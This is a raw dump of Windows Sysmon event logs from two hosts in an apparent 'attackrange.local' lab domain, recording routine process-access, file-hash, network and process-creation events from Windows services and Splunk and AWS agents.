07:52:58.996{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081812Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:58.996{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081811Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:58.996{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081810Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:58.996{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081809Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:58.996{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081808Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:58.996{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081807Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:58.996{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081806Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:58.996{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B2DA-615A-5601-00000000FD01}1444C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x8000000000000000103931Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:00.795{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F70C3B5032D72D86F1EB3F343D6BA7D2,SHA256=B0448FA5AABD8BA21DEBFA7A25724182BB1354D0545F95F7F5448FBB48401D45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081823Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:00.674{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\surveyor-20211004072618-026MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081822Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:00.439{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11D89FBFED052D3CCB88607600DC04B1,SHA256=BB74D8F0BA760C783D5C8E35545E29BC18F26F9346A6E9982BB401D5081AA319,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103930Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:00.654{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9BB5C26FF63453FA399F5BC9F40D00A8,SHA256=F603B01535EB5CE821F8BB87BCCDE794698E70125C877DAD3734A243FEB6CA59,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103929Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:00.514{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B2DC-615A-DD01-00000000FC01}1360C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103928Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:00.514{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103927Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:00.514{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103926Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:00.514{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103925Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:00.514{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103924Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:00.514{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B2DC-615A-DD01-00000000FC01}1360C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103923Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:00.514{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B2DC-615A-DD01-00000000FC01}1360C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103922Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:00.514{58E9C193-B2DC-615A-DD01-00000000FC01}1360C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000103921Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:58.266{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49561-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000103920Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:58.266{58E9C193-ACB4-615A-2700-00000000FC01}2920C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49561-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x800000000000000081821Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:57.768{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50055-false10.0.1.12-8000- 23542300x800000000000000081820Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:00.157{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B831ECAE67AD99EC2061D4790862DEDF,SHA256=7F9975545EB4EB828E4386F212DEE05BFD5EA11AEC62001EE1AF55FB69364DEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081819Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:00.157{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=56C586A7EF5ED4C7688E78E611543013,SHA256=5757620F1700A6FA4A53F98426225F414B749F208B32E6196E425EB20F7815DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103933Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:01.795{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25331D998076C5194E17F12E9153203B,SHA256=C6EEA3F530E01084D07A693E09ABDB99D2D7BC2A152E1C2213CD5B4733A1C5BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081824Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:01.442{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84BB58CD0491AA5B4FAFE74A1037667A,SHA256=D111FE34395B6A32391D1F91B01883189903ECF08FA9741D57216E99F06C0639,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103932Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:58.438{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49562-false10.0.1.12-8000- 23542300x800000000000000081825Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:02.442{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2647CFD25CC7C78E1DE979EA70AB7D1,SHA256=B90F3096BFAEB52B685B5974950B9FB3C8995C300A3316D29EF9E0B6E1997C6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103943Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:02.810{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCEB7F91C0CE33D7F3FC219F9FC171D7,SHA256=7F39A7CAA1AC7F9D4E6F985D24C21B2C55DA99590EF0A6407DC510DD7969A2ED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103942Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:02.373{58E9C193-B2DE-615A-DE01-00000000FC01}57481112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103941Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:02.170{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B2DE-615A-DE01-00000000FC01}5748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103940Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:02.170{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103939Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:02.170{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103938Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 